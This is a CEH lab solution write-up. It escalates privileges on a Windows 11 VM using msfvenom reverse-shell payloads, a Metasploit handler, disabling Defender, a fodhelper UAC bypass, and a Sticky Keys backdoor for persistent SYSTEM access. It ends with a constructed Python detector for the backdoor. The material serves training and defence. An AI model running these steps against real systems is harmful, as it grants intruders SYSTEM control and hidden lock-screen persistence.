Lab2_Task1_StickyKeys_Solution

This document outlines the steps to escalate privileges on a Windows 11 machine by bypassing User Account Control (UAC) and exploiting the Sticky Keys feature using a Metasploit payload. The procedure includes setting up an attacker machine, generating a payload, executing it on the target machine, and establishing persistent SYSTEM-level access. The final steps involve testing the exploit and cleaning up the environment after successful privilege escalation.


Lab Solution: Module 6, Lab 2, Task 1 - Escalate Privileges by Bypassing UAC and
Exploiting Sticky Keys

Introduction
This document details the steps to complete Task 1 of Lab 2 from Module 06 (System
Hacking) of the CEH v13 Lab Manual. The objective is to gain initial access to a Windows
11 machine using a Metasploit payload, bypass User Account Control (UAC) to gain
SYSTEM privileges, and then exploit the Sticky Keys accessibility feature to establish
persistent SYSTEM-level access even from the lock screen.

Lab Environment
• Attacker Machine: Parrot Security VM (IP: 10.10.1.13 - Example from Manual)
• Target Machine: Windows 11 VM
• Credentials: Parrot (attacker/toor), Windows Admin (CEH/Pa$$w0rd), Windows
User (Martin/apple)

Procedure

Step 1: Initial Setup

Ensure both the Parrot Security and Windows 11 virtual machines are powered on and
networked correctly. Log in to the Parrot Security VM using the provided credentials
(attacker/toor).

Step 2: Generate Payload

Open a terminal window on the Parrot Security machine. Elevate privileges to root using
sudo su (password: toor) and change to root's home directory with cd. Generate the
initial Meterpreter payload using msfvenom. This executable will be used to establish
the first connection to the target machine.

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/windows.exe

(Note: Replace 10.10.1.13 with the actual IP address of your Parrot Security VM. The
output path /home/attacker/Desktop/windows.exe assumes the user is 'attacker';
adjust if necessary.)

Step 3: Setup Metasploit Handler

Launch the Metasploit Framework console by typing msfconsole in the terminal. Configure
a listener (handler) to receive the incoming connection from the payload once it's
executed on the target machine.

use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.1.13
set lport 444
exploit -j -z

This runs the handler as a background job (-j) and tells Metasploit not to interact with
a session automatically as soon as one opens (-z), so the console stays free for the
following steps.

Step 4: Target Machine Preparation and Payload Execution

Switch to the Windows 11 VM and log in as the Administrator (CEH/Pa$$w0rd). Before
transferring and running the payload, it's often necessary to disable antivirus software,
such as Windows Defender's real-time protection, to prevent the payload from being
detected and removed.

Navigate to Windows Security settings -> Virus & threat protection -> Manage settings,
and toggle Real-time protection off.

Transfer the generated windows.exe file from the Parrot VM's Desktop to the Windows
11 VM. This can be done via various methods like setting up a simple web server on
Parrot (python3 -m http.server 80 in the Desktop directory) and downloading
from the Windows browser, using shared folders, USB drives, etc. Once transferred,
double-click and run the windows.exe file on the Windows 11 machine.

Step 5: Establish Initial Meterpreter Session

Switch back to the Parrot Security VM's Metasploit console. A message indicating a new
Meterpreter session has opened should appear shortly after the payload is executed on
the target.

List the active sessions using sessions. Interact with the newly opened session
(assuming it's ID 1) using sessions -i 1.

Verify the user context of the current session by typing getuid. This should display the
username under which the payload was executed (e.g., WINDOWS11\Admin).

Step 6: Bypass UAC

To gain higher privileges, background the current Meterpreter session using the
background command. Search for and use a UAC bypass exploit module. The
bypassuac_fodhelper module is commonly used.

use exploit/windows/local/bypassuac_fodhelper
show options
set SESSION 1
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.1.13
set LPORT 4444
exploit

(Note: We set a different payload architecture (x64) and LPORT (4444) for the elevated
session as per the lab manual's example. Ensure the LHOST matches your Parrot VM's
IP.)

Step 7: Gain SYSTEM Privileges

A successful UAC bypass will create a new Meterpreter session. List sessions again
(sessions) and interact with the new session (e.g., sessions -i 2). Verify the
privilege level by running getuid. The output should now be NT AUTHORITY\SYSTEM,
indicating the highest level of privilege.

Step 8: Exploit Sticky Keys for Persistence

Background the SYSTEM-level Meterpreter session (background). Use the Sticky Keys
post-exploitation module to replace the Sticky Keys executable (sethc.exe) with a
command prompt (cmd.exe). This allows launching a SYSTEM command prompt from
the login/lock screen by pressing the Shift key five times.

use post/windows/manage/sticky_keys
show options
set SESSION 2
exploit

Step 9: Test Sticky Keys Exploit

Switch back to the Windows 11 VM. Sign out of the Admin account. Log in as the non-
privileged user 'Martin' (password: apple). Lock the screen (Windows Key + L).

From the lock screen, press the Shift key five times consecutively. Instead of the usual
Sticky Keys prompt, a Command Prompt window should appear.
Inside this command prompt, type whoami and press Enter. The output should confirm
that the command prompt is running as nt authority\system.

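
As an added defender-side example (not part of the lab manual or of Metasploit), the
following Python flags the two observable effects of Steps 8 and 9 in simple event
records: an accessibility binary rewritten in System32 by something other than the
Windows servicing stack, and a shell started by winlogon.exe at the lock screen. The
"key=value; ..." record format, its field names and every sample line are constructed to
mimic Windows Security 4688 and Sysmon 11 events; real telemetry would be mapped onto
them.

```python
ACCESSIBILITY_BINS = {"sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                      "magnify.exe", "displayswitch.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Servicing-stack processes that legitimately rewrite files in System32.
TRUSTED_WRITERS = {"trustedinstaller.exe", "tiworker.exe", "msiexec.exe"}

def parse_record(line):
    """Parse 'key=value; key=value' (constructed format) into a dict."""
    fields = {}
    for part in line.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields

def basename(path):
    """Lowercase file name of a Windows path ('C:\\x\\cmd.exe' -> 'cmd.exe')."""
    return path.lower().rsplit("\\", 1)[-1]

def classify(rec):
    """Return an alert string for a suspicious record, or None."""
    event = rec.get("event")
    if event == "4688":  # process creation
        parent, image = basename(rec.get("parent", "")), basename(rec.get("image", ""))
        # Step 9 effect: winlogon.exe launches sethc.exe for Shift x5, so a
        # shell appearing under winlogon.exe (as SYSTEM) is the backdoor firing.
        if parent == "winlogon.exe" and image in SHELLS:
            return f"shell {image} spawned by winlogon.exe as {rec.get('user', '?')}"
    elif event == "11":  # Sysmon file create
        target, writer = rec.get("target", ""), basename(rec.get("image", ""))
        # Step 8 effect: an accessibility binary in System32 rewritten by
        # something other than the Windows servicing stack.
        if ("\\system32\\" in target.lower() and basename(target) in ACCESSIBILITY_BINS
                and writer not in TRUSTED_WRITERS):
            return f"{basename(target)} written in System32 by {writer}"
    return None

def scan(lines):
    """Run classify over every record; return the list of alerts."""
    return [a for a in (classify(parse_record(l)) for l in lines) if a]

SAMPLE_LOG = [  # constructed records, not captured output
    r"event=4688; parent=C:\Windows\System32\winlogon.exe; image=C:\Windows\System32\sethc.exe; user=NT AUTHORITY\SYSTEM",
    r"event=11; image=C:\Windows\System32\TiWorker.exe; target=C:\Windows\System32\sethc.exe",
    r"event=11; image=C:\Users\Admin\Desktop\windows.exe; target=C:\Windows\System32\sethc.exe",
    r"event=4688; parent=C:\Windows\System32\winlogon.exe; image=C:\Windows\System32\cmd.exe; user=NT AUTHORITY\SYSTEM",
    r"event=4688; parent=C:\Windows\explorer.exe; image=C:\Windows\System32\cmd.exe; user=WINDOWS11\Martin",
]

ALERTS = scan(SAMPLE_LOG)  # two alerts expected: the file swap and the lock-screen shell
```

The legitimate sethc.exe launch by winlogon.exe and the servicing-stack write produce no
alert, which is what keeps the rule quiet on a healthy host.
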
Step 10: Conclusion and Cleanup

You have successfully escalated privileges from an administrator account to SYSTEM and
then exploited Sticky Keys to gain persistent SYSTEM-level access from the lock screen,
even when logged in as a non-privileged user. Document all findings and acquired
information. Close all open windows and Meterpreter sessions. Finally, shut down both
the Windows 11 and Parrot Security virtual machines.

(Optional Cleanup: To restore Sticky Keys functionality, you would typically run the
sticky_keys module again with the ACTION option set to CLEANUP from the
SYSTEM Meterpreter session before shutting down.)

Note: Due to limitations in generating images depicting specific exploit commands or
outputs, generic placeholder images representing the relevant interfaces (terminal,
Metasploit console, Windows prompts) are used below. The descriptions accurately
reflect the expected content of each screenshot.
